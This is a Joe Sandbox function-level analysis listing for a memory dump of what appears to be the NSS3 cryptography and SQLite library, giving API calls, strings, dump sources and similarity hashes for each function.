Function 6C5D0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_PubDeriveWithKDF.NSS3 ref: 6C5D0F8D
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5D0FB3
PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C5D1006
PK11_FreeSymKey.NSS3(?), ref: 6C5D101C
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5D1033
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C5D103F
PK11_FreeSymKey.NSS3(00000000), ref: 6C5D1048
memcpy.VCRUNTIME140(?,?,?), ref: 6C5D108E
SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C5D10BB
memcpy.VCRUNTIME140(?,00000006,?), ref: 6C5D10D6
memcpy.VCRUNTIME140(?,?,?), ref: 6C5D112E

Part of subcall function 6C5D1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C5D08C4,?,?), ref: 6C5D15B8
Part of subcall function 6C5D1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C5D08C4,?,?), ref: 6C5D15C1
Part of subcall function 6C5D1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D162E
Part of subcall function 6C5D1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D1637

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
String ID:
API String ID: 1510409361-0
Opcode ID: 21696324727fa56f3e8ec5daf217b48384f363d9e5cf07f3bb2099389567b682
Instruction ID: 766d3d86756bd15a1f515fae0298fd34e4a148e554c67894797c366a371209e1
Opcode Fuzzy Hash: 21696324727fa56f3e8ec5daf217b48384f363d9e5cf07f3bb2099389567b682
Instruction Fuzzy Hash: 7D71C0B1A04305CFDB04CFA9CC84A6BB7B0BF88328F158629E51997711E771E994CB95

Function 6C5F1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6C5F1F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6C5F2166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C5F228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6C5F23B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5F241C

Strings

model, xrefs: 6C5F23CB, 6C5F23EC
manufacturer, xrefs: 6C5F2179
token, xrefs: 6C5F1F2C
serial, xrefs: 6C5F22A2

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: 34e00cc538c92bf96d6d1123a08db23ff7c078627f43020a27d0d638d6dad6cd
Instruction ID: a46ea494658b9ea36c5923c55409e517a28b7f64cb3d583e4f82d765bd9b51d2
Opcode Fuzzy Hash: 34e00cc538c92bf96d6d1123a08db23ff7c078627f43020a27d0d638d6dad6cd
Instruction Fuzzy Hash: E502FDF2D0C7C86EF7358671CC4C7D76EE09B46328F08166EC5AE466C3C3A8598A8B55

Function 6C530FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 6C52CA30: EnterCriticalSection.KERNEL32(?,?,?,6C58F9C9,?,6C58F4DA,6C58F9C9,?,?,6C55369A), ref: 6C52CA7A
Part of subcall function 6C52CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C52CB26

memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C53103E
EnterCriticalSection.KERNEL32(?), ref: 6C531139
LeaveCriticalSection.KERNEL32(?), ref: 6C531190
sqlite3_free.NSS3(00000000), ref: 6C531227
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C53126E
sqlite3_free.NSS3(?), ref: 6C53127F

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6C531267
winAccess, xrefs: 6C53129B
Pkl, xrefs: 6C53109E

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
String ID: Pkl$delayed %dms for lock/sharing conflict at line %d$winAccess
API String ID: 2733752649-926248632
Opcode ID: 78307b25654e614f65006c18baf6a5852ba02d182b7606668033b777e4b32967
Instruction ID: 38c5e574a9c9bd9703c2fd6399bcb1cf5a032e457ce5f2168c7a1de00416df26
Opcode Fuzzy Hash: 78307b25654e614f65006c18baf6a5852ba02d182b7606668033b777e4b32967
Instruction Fuzzy Hash: A4711B727042219BEB049F36EC89A9B3776FB86314F145639F929D7680FB30D805C796

Function 6C5F6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C5A1C6F,00000000,00000004,?,?), ref: 6C5F6C3F

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C5A1C6F,00000000,00000004,?,?), ref: 6C5F6C60
PR_ExplodeTime.NSS3(00000000,6C5A1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C5A1C6F,00000000,00000004,?,?), ref: 6C5F6C94

Strings

gfff, xrefs: 6C5F6D66
gfff, xrefs: 6C5F6CF5
gfff, xrefs: 6C5F6D9C
gfff, xrefs: 6C5F6D30
gfff, xrefs: 6C5F6CFD

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 67833f817f1f0361294f254690c2a0c22a414f38dd72f47b14a9aabfca02760c
Instruction ID: f020e1ac25fde6a61451c745d83258b696ceddd4b233757505d93e1040a04402
Opcode Fuzzy Hash: 67833f817f1f0361294f254690c2a0c22a414f38dd72f47b14a9aabfca02760c
Instruction Fuzzy Hash: 49513C72B016494FC70CCDADDC626DABBDA9BE4310F48C23AE442DB781DA78D906C751

Function 6C670F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C671027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6710B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C671353

Strings

$, xrefs: 6C6712A0
'%.*q', xrefs: 6C671217, 6C671292
%lld, xrefs: 6C67114B
%02x, xrefs: 6C6712F6
zeroblob(%d), xrefs: 6C671223
NULL, xrefs: 6C67119E
-- , xrefs: 6C670FF5

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 7906385e054ef2b622872cf0d1050bb821222faa36a1336009b0063e2a84fb74
Instruction ID: c4822a055ab390f2f92730cc7109253b584a99e95cea9bbf3acbe995c80ae58a
Opcode Fuzzy Hash: 7906385e054ef2b622872cf0d1050bb821222faa36a1336009b0063e2a84fb74
Instruction Fuzzy Hash: C8E1AF71908340DFD720CF14C890AABBBF1AF86358F148D1EE9998BB51E771E845CB66

Function 6C678FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C678FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6790DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C679118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C67915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6791C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C679209

Strings

UUUU, xrefs: 6C679255
3333, xrefs: 6C67925E

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 70f5bdb04e8338f8727fb21057b5617e0d6f40a72be20a95324876faebf86d45
Instruction ID: b4c2d2dc71742ad88ab336cdefafc28177d34a1cf6c59e52ea6cd0023e4a19d6
Opcode Fuzzy Hash: 70f5bdb04e8338f8727fb21057b5617e0d6f40a72be20a95324876faebf86d45
Instruction Fuzzy Hash: 83A1CE72E001159BDB18CB68CC95BEEB7F5BF89328F094168E915B7341E736AC11CBA4

Function 6C60BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C60BD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C60BD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C60BD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C60BD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C60BDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C60BDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C60BDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C60BE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C60BE1E

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: 74e51e9d0e222dbd77700cfe803cf0df00b326b183f0ec3be0c7d02e682daf4a
Instruction ID: 8788c94e95b78f71fe6bc605a1859756e82dd534f525ed779cd3765b2a9bdc84
Opcode Fuzzy Hash: 74e51e9d0e222dbd77700cfe803cf0df00b326b183f0ec3be0c7d02e682daf4a
Instruction Fuzzy Hash: 7F21E376F0068957FB044A53AE46F8B73B49BD2B8DF084024F916BE681E3509418C2AE

Function 6C6B8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C7014E4,6C66CC70), ref: 6C6B8D47
PR_GetCurrentThread.NSS3 ref: 6C6B8D98

Part of subcall function 6C590F00: PR_GetPageSize.NSS3(6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F1B
Part of subcall function 6C590F00: PR_NewLogModule.NSS3(clock,6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C6B8E7B
htons.WSOCK32(?), ref: 6C6B8EDB
PR_GetCurrentThread.NSS3 ref: 6C6B8F99
PR_GetCurrentThread.NSS3 ref: 6C6B910A

Strings

%u.%u.%u.%u, xrefs: 6C6B8E74

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: e28ef4d420b64be7b70f8de34879f65e6834df93a674dc27caf123bcdd3ff5e1
Instruction ID: e921386ddbbd3962b5d28853a2c36d4b4344a62d150ad6c65716888a5861c22e
Opcode Fuzzy Hash: e28ef4d420b64be7b70f8de34879f65e6834df93a674dc27caf123bcdd3ff5e1
Instruction Fuzzy Hash: B702BB319062528FDB14CF19C4583A6BBB3EF5730CF1A825ED8956FAA1C331D925C794

Function 6C53EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

not authorized, xrefs: 6C53F957, 6C53F9BA
%s %T already exists, xrefs: 6C53FAC8
view, xrefs: 6C53F061, 6C53F071, 6C53FAB7
table, xrefs: 6C53F05C, 6C53FABC, 6C53FAC7
sqlite_master, xrefs: 6C53F0AB, 6C53F2DA, 6C53F757, 6C53F93E
sqlite_temp_master, xrefs: 6C53F0A6, 6C53F2D5
there is already an index named %s, xrefs: 6C53F9D7
temporary table name must be unqualified, xrefs: 6C53F734
authorizer malfunction, xrefs: 6C53F95C, 6C53F9BF, 6C53FA5E, 6C53FA8B

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 4526218e79ed842e8db6623b28315b34b6b69758bd76fc75a51efeac8ca5b10e
Instruction ID: c71499d35a6dfe75b07d843bbd81a8810e85ee81588c20e612f9dee2d6221fa1
Opcode Fuzzy Hash: 4526218e79ed842e8db6623b28315b34b6b69758bd76fc75a51efeac8ca5b10e
Instruction Fuzzy Hash: 7472B270E04215CFDB14CF68C884BA9BBF1BF89308F1592ADD8199B752E775E845CB90

Function 6C659C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6C52C52B), ref: 6C659D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C65A035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C65A114

Strings

%s at line %d of [%.10s], xrefs: 6C65A02E, 6C65A10D
database corruption, xrefs: 6C65A029, 6C65A108
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C65A01F, 6C65A0E4, 6C65A0FE

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: c21f5f60334f071a5b00de2a4dcfddfe2e00e2f4f81665d0df82d1eefa75e631
Instruction ID: 27288e1f21a376bd2e864af6acf64ace8ad4bdf0d9c15696b15c65bb28e09606
Opcode Fuzzy Hash: c21f5f60334f071a5b00de2a4dcfddfe2e00e2f4f81665d0df82d1eefa75e631
Instruction Fuzzy Hash: 1022D07060C7418FC704CF29C49066AB7E1BFCA348FA48A2DE9DA97642D731D856CB5A

Function 6C679D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C538637,?,?), ref: 6C679E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C538637), ref: 6C679ED6

Strings

%s at line %d of [%.10s], xrefs: 6C679ECF
database corruption, xrefs: 6C679ECA
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C679EC0

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: ec1cf0cad3aa0ff7c392398078a71f0efcf011bfa8bf5d66ac0e2891dfbf2742
Instruction ID: 3961b7f499d5c1cf9b5a94ac546b91a428b7b59b38484617b04870829d4265b4
Opcode Fuzzy Hash: ec1cf0cad3aa0ff7c392398078a71f0efcf011bfa8bf5d66ac0e2891dfbf2742
Instruction Fuzzy Hash: A581D631B012058FCB14CF6AC980ADEB7F6EF89308F148929E915AB741E731ED45CB68

Function 6C687F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6881BC

Strings

out of memory, xrefs: 6C68835B
BINARY, xrefs: 6C688126

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memset
String ID: BINARY$out of memory
API String ID: 2221118986-3971123528
Opcode ID: 5a5176dc28201b66530e2845f6cfba55325da37c3e9b0167ac7ea288f8a11a8d
Instruction ID: 35649ed460d387932a242f6d6ec62ae6769674711f705f8a86a03939f5c3a330
Opcode Fuzzy Hash: 5a5176dc28201b66530e2845f6cfba55325da37c3e9b0167ac7ea288f8a11a8d
Instruction Fuzzy Hash: F752C171E06218DFDB14CF99C890BDDBBB2FF49308F14815AD855AB761D730A846CBA8

Function 6C609EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C609ED6

Part of subcall function 6C6014C0: TlsGetValue.KERNEL32 ref: 6C6014E0
Part of subcall function 6C6014C0: EnterCriticalSection.KERNEL32 ref: 6C6014F5
Part of subcall function 6C6014C0: PR_Unlock.NSS3 ref: 6C60150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C609EE4

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C609F38

Part of subcall function 6C60D030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C609F0B), ref: 6C60D03B
Part of subcall function 6C60D030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C60D04E
Part of subcall function 6C60D030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C60D07B
Part of subcall function 6C60D030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C60D08E
Part of subcall function 6C60D030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C60D09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C609F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C609F59

Part of subcall function 6C609D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C609C5B), ref: 6C609D82
Part of subcall function 6C609D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C609C5B), ref: 6C609DA9
Part of subcall function 6C609D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C609C5B), ref: 6C609DCE
Part of subcall function 6C609D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C609C5B), ref: 6C609E43

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
